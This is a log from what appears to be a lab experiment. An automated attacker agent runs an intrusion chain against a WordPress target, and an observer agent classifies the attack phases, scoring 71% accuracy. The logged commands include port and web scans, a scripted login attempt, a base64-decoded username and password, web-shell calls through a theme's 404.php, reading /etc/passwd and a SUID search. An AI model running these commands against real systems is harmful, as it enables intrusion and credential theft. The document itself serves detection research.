Infraestructura verificada. Todos los containers activos.
AGENTE OBSERVADOR INICIADO
[22:15:02] INFO     [Observador] Logs recolectados: 22 (de 22   collectors.py:66
                    total)                                                      
           INFO     [Observador] Logs recolectados: 22, nuevos: True nodes.py:81
           INFO     [Observador] Triaje: sin senal relevante (2/22  nodes.py:122
                    logs anomalos)                                              
[22:15:05] INFO     Estado inicial: target=10.10.0.20,              graph.py:106
                    tacticas=['reconnaissance', 'initial_access',               
                    'execution', 'discovery', 'credential_access',              
                    'privilege_escalation']                                     

AGENTE ATACANTE INICIADO
  Target: 10.10.0.20
  Tacticas: ['reconnaissance', 'initial_access', 'execution', 'discovery', 
'credential_access', 'privilege_escalation']
           INFO     [Atacante] Planificando accion para tactica:     nodes.py:78
                    reconnaissance                                              
[22:15:08] INFO     [Atacante] Ejecutando: run_nmap({'target':      nodes.py:112
                    '10.10.0.20', 'flags': '-sV -sC -p-'})                      
           INFO     [attacker] Ejecutando: nmap -sV -sC -p-  docker_client.py:80
                    10.10.0.20                                                  
[22:15:18] INFO     [attacker] Exit code: 0, output: 571    docker_client.py:108
                    chars                                                       
           INFO     [Atacante] Ejecutando: run_nikto({'target':     nodes.py:112
                    '10.10.0.20'})                                              
           INFO     [attacker] Ejecutando:                   docker_client.py:80
                    /usr/local/bin/nikto -h 10.10.0.20  2>&1                    
                    | tail -60                                                  
[22:15:33] INFO     [Observador] Logs recolectados: 5000 (de    collectors.py:66
                    5000 total)                                                 
           INFO     [Observador] Logs recolectados: 5000, nuevos:    nodes.py:81
                    True                                                        
           INFO     [Observador] Triaje: senal detectada (1135/5000 nodes.py:116
                    logs anomalos, ratio=22.7%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:15:48] INFO     [Observador] Clasificacion: Reconnaissance      nodes.py:399
                    (confianza: 95%)                                            
  Clasificacion: Reconnaissance (confianza: 95%)
[22:16:18] INFO     [Observador] Logs recolectados: 5000 (de    collectors.py:66
                    5000 total)                                                 
           INFO     [Observador] Logs recolectados: 5000, nuevos:    nodes.py:81
                    True                                                        
           INFO     [Observador] Triaje: senal detectada (1233/5000 nodes.py:116
                    logs anomalos, ratio=24.7%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:16:36] INFO     [Observador] Clasificacion: Reconnaissance      nodes.py:399
                    (confianza: 95%)                                            
  Clasificacion: Reconnaissance (confianza: 95%)
[22:17:06] INFO     [Observador] Logs recolectados: 5000 (de    collectors.py:66
                    5000 total)                                                 
           INFO     [Observador] Logs recolectados: 5000, nuevos:    nodes.py:81
                    True                                                        
           INFO     [Observador] Triaje: senal detectada (1235/5000 nodes.py:116
                    logs anomalos, ratio=24.7%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:17:21] INFO     [Observador] Clasificacion: Reconnaissance      nodes.py:399
                    (confianza: 95%)                                            
  Clasificacion: Reconnaissance (confianza: 95%)
[22:17:51] INFO     [Observador] Logs recolectados: 5000 (de    collectors.py:66
                    5000 total)                                                 
           INFO     [Observador] Logs recolectados: 5000, nuevos:    nodes.py:81
                    True                                                        
           INFO     [Observador] Triaje: senal detectada (1237/5000 nodes.py:116
                    logs anomalos, ratio=24.7%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:17:56] INFO     [Observador] Clasificacion: Reconnaissance      nodes.py:399
                    (confianza: 95%)                                            
  Clasificacion: Reconnaissance (confianza: 95%)
[22:18:19] INFO     [attacker] Exit code: 124, output: 0    docker_client.py:108
                    chars                                                       
  Ejecutado: run_nikto
[22:18:22] INFO     [Atacante] Avanzando a tactica: initial_access  nodes.py:221
  >> Avanzando a: initial_access
           INFO     [Atacante] Planificando accion para tactica:     nodes.py:78
                    initial_access                                              
[22:18:24] INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    'curl -s http://10.10.0.20/robots.txt'})                    
           INFO     [attacker] Ejecutando: curl -s           docker_client.py:80
                    http://10.10.0.20/robots.txt                                
           INFO     [attacker] Exit code: 0, output: 41     docker_client.py:108
                    chars                                                       
           INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    'curl -s http://10.10.0.20/license.txt'})                   
           INFO     [attacker] Ejecutando: curl -s           docker_client.py:80
                    http://10.10.0.20/license.txt                               
           INFO     [attacker] Exit code: 0, output: 208    docker_client.py:108
                    chars                                                       
  Ejecutado: run_command
[22:18:26] INFO     [Observador] Logs recolectados: 4521 (de    collectors.py:66
                    4521 total)                                                 
           INFO     [Observador] Logs recolectados: 4521, nuevos:    nodes.py:81
                    True                                                        
           INFO     [Observador] Triaje: senal detectada (1197/4521 nodes.py:116
                    logs anomalos, ratio=26.5%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:18:27] INFO     [Atacante] Avanzando a tactica: execution       nodes.py:221
  >> Avanzando a: execution
           INFO     [Atacante] Planificando accion para tactica:     nodes.py:78
                    execution                                                   
[22:18:29] INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    "curl -s -D - -c /tmp/wp_cookies.txt -b                     
                    'wordpress_test_cookie=WP+Cookie+check' -d                  
                    'log=admin&pwd@123&wp-submit=Log+In&redirect_to             
                    =%2Fwp-admin%2F&testcookie=1'                               
                    http://10.10.0.20/wp-login.php | head -10"})                
           INFO     [attacker] Ejecutando: curl -s -D - -c   docker_client.py:80
                    /tmp/wp_cookies.txt -b                                      
                    'wordpress_test_cookie=WP+Cookie+check'                     
                    -d                                                          
                    'log=admin&pwd@123&wp-submit=Log+In&redi                    
                    rect_to=%2Fwp-admin%2F&testcookie=1'                        
                    http://10.10.0.20/wp-login.php | head                       
                    -10                                                         
[22:18:30] INFO     [attacker] Exit code: 0, output: 330    docker_client.py:108
                    chars                                                       
  Ejecutado: run_command
[22:18:31] INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    'curl -s http://10.10.0.20/fsocity.dic | head               
                    -20'})                                                      
           INFO     [attacker] Ejecutando: curl -s           docker_client.py:80
                    http://10.10.0.20/fsocity.dic | head -20                    
[22:18:32] INFO     [attacker] Exit code: 0, output: 153    docker_client.py:108
                    chars                                                       
           INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    'curl -s http://10.10.0.20/key-1-of-3.txt'})                
           INFO     [attacker] Ejecutando: curl -s           docker_client.py:80
                    http://10.10.0.20/key-1-of-3.txt                            
           INFO     [attacker] Exit code: 0, output: 33     docker_client.py:108
                    chars                                                       
           INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    "echo 'ZWxsaW90OkVSMjgtMDY1Mgo=' | base64 -d"})             
           INFO     [attacker] Ejecutando: echo              docker_client.py:80
                    'ZWxsaW90OkVSMjgtMDY1Mgo=' | base64 -d                      
           INFO     [attacker] Exit code: 0, output: 17     docker_client.py:108
                    chars                                                       
  Ejecutado: run_command
[22:18:34] INFO     [Atacante] Avanzando a tactica: discovery       nodes.py:221
  >> Avanzando a: discovery
           INFO     [Atacante] Planificando accion para tactica:     nodes.py:78
                    discovery                                                   
[22:18:35] INFO     [Atacante] Ejecutando: run_web_shell({'cmd':    nodes.py:112
                    'uname -a && whoami && id', 'url':                          
                    'http://10.10.0.20/wp-content/themes/twentyfift             
                    een/404.php'})                                              
           INFO     [attacker] Ejecutando: curl -s           docker_client.py:80
                    'http://10.10.0.20/wp-content/themes/twe                    
                    ntyfifteen/404.php?cmd=uname%20-a%20%26%                    
                    26%20whoami%20%26%26%20id'                                  
           INFO     [attacker] Exit code: 0, output: 272    docker_client.py:108
                    chars                                                       
  Ejecutado: run_web_shell
[22:18:38] INFO     [Atacante] Avanzando a tactica:                 nodes.py:221
                    credential_access                                           
  >> Avanzando a: credential_access
           INFO     [Atacante] Planificando accion para tactica:     nodes.py:78
                    credential_access                                           
[22:18:39] INFO     [Atacante] Ejecutando: run_command({'command':  nodes.py:112
                    'cat /etc/passwd | grep robot'})                            
           INFO     [attacker] Ejecutando: cat /etc/passwd | docker_client.py:80
                    grep robot                                                  
           INFO     [attacker] Exit code: 1, output: 0      docker_client.py:108
                    chars                                                       
  Ejecutado: run_command
[22:18:41] INFO     [Atacante] Avanzando a tactica:                 nodes.py:221
                    privilege_escalation                                        
  >> Avanzando a: privilege_escalation
           INFO     [Atacante] Planificando accion para tactica:     nodes.py:78
                    privilege_escalation                                        
[22:18:42] INFO     [Atacante] Ejecutando: run_web_shell({'cmd':    nodes.py:112
                    'find / -perm -u=s -type f 2>/dev/null', 'url':             
                    'http://10.10.0.20/wp-content/themes/twentyfift             
                    een/404.php'})                                              
           INFO     [attacker] Ejecutando: curl -s           docker_client.py:80
                    'http://10.10.0.20/wp-content/themes/twe                    
                    ntyfifteen/404.php?cmd=find%20/%20-perm%                    
                    20-u%3Ds%20-type%20f%202%3E/dev/null'                       
           INFO     [attacker] Exit code: 0, output: 272    docker_client.py:108
                    chars                                                       
  Ejecutado: run_web_shell
[22:18:44] INFO     [Atacante] Todas las tacticas completadas.      nodes.py:212
                    Ataque finalizado.                                          
AGENTE ATACANTE FINALIZADO

[22:18:48] INFO     [Observador] Detectadas en ventana:             nodes.py:394
                    Reconnaissance, Initial Access | Actual:                    
                    Initial Access (80%)                                        
  En ventana: Reconnaissance, Initial Access | Actual: Initial Access (80%)
[22:19:18] INFO     [Observador] Logs recolectados: 76 (de 76   collectors.py:66
                    total)                                                      
           INFO     [Observador] Logs recolectados: 76, nuevos: True nodes.py:81
           INFO     [Observador] Triaje: senal detectada (15/76     nodes.py:116
                    logs anomalos, ratio=19.7%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:19:32] INFO     [Observador] Detectadas en ventana:             nodes.py:394
                    Reconnaissance, Initial Access | Actual:                    
                    Initial Access (80%)                                        
  En ventana: Reconnaissance, Initial Access | Actual: Initial Access (80%)
[22:20:02] INFO     [Observador] Logs recolectados: 68 (de 68   collectors.py:66
                    total)                                                      
           INFO     [Observador] Logs recolectados: 68, nuevos: True nodes.py:81
           INFO     [Observador] Triaje: senal detectada (15/68     nodes.py:116
                    logs anomalos, ratio=22.1%)                                 
           INFO     [Observador] Senales detectadas:                nodes.py:349
                    ['suspicious_ips']                                          
[22:20:11] INFO     [Observador] Detectadas en ventana:             nodes.py:394
                    Reconnaissance, Initial Access | Actual:                    
                    Initial Access (80%)                                        
  En ventana: Reconnaissance, Initial Access | Actual: Initial Access (80%)
AGENTE OBSERVADOR FINALIZADO

                   Resultados: Ground Truth vs Clasificacion                    
┏━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━┳━━━━━━━┓
┃                     ┃               ┃ Real       ┃ Obs        ┃      ┃       ┃
┃ Ventana             ┃ Real (actual) ┃ (ventana)  ┃ (actual)   ┃ Conf ┃ Match ┃
┡━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━╇━━━━━━━┩
│ 2026-04-10T03:15:48 │ recon         │            │ recon      │  95% │  OK   │
│ 2026-04-10T03:16:36 │ recon         │            │ recon      │  95% │  OK   │
│ 2026-04-10T03:17:21 │ recon         │            │ recon      │  95% │  OK   │
│ 2026-04-10T03:17:56 │ recon         │            │ recon      │  95% │  OK   │
│ 2026-04-10T03:18:48 │ init_access   │ recon      │ init_acce… │  80% │  OK   │
│ 2026-04-10T03:19:32 │ priv_esc      │ recon,     │ init_acce… │  80% │ MISS  │
│                     │               │ init_acce… │            │      │       │
│                     │               │ execution, │            │      │       │
│                     │               │ discovery, │            │      │       │
│                     │               │ cred_acce… │            │      │       │
│ 2026-04-10T03:20:11 │ priv_esc      │ recon,     │ init_acce… │  80% │ MISS  │
│                     │               │ init_acce… │            │      │       │
│                     │               │ execution, │            │      │       │
│                     │               │ discovery, │            │      │       │
│                     │               │ cred_acce… │            │      │       │
└─────────────────────┴───────────────┴────────────┴────────────┴──────┴───────┘
Match estricto: Obs(actual) == ultima tactica real en ventana

Accuracy (estricta): 5/7 (71%)
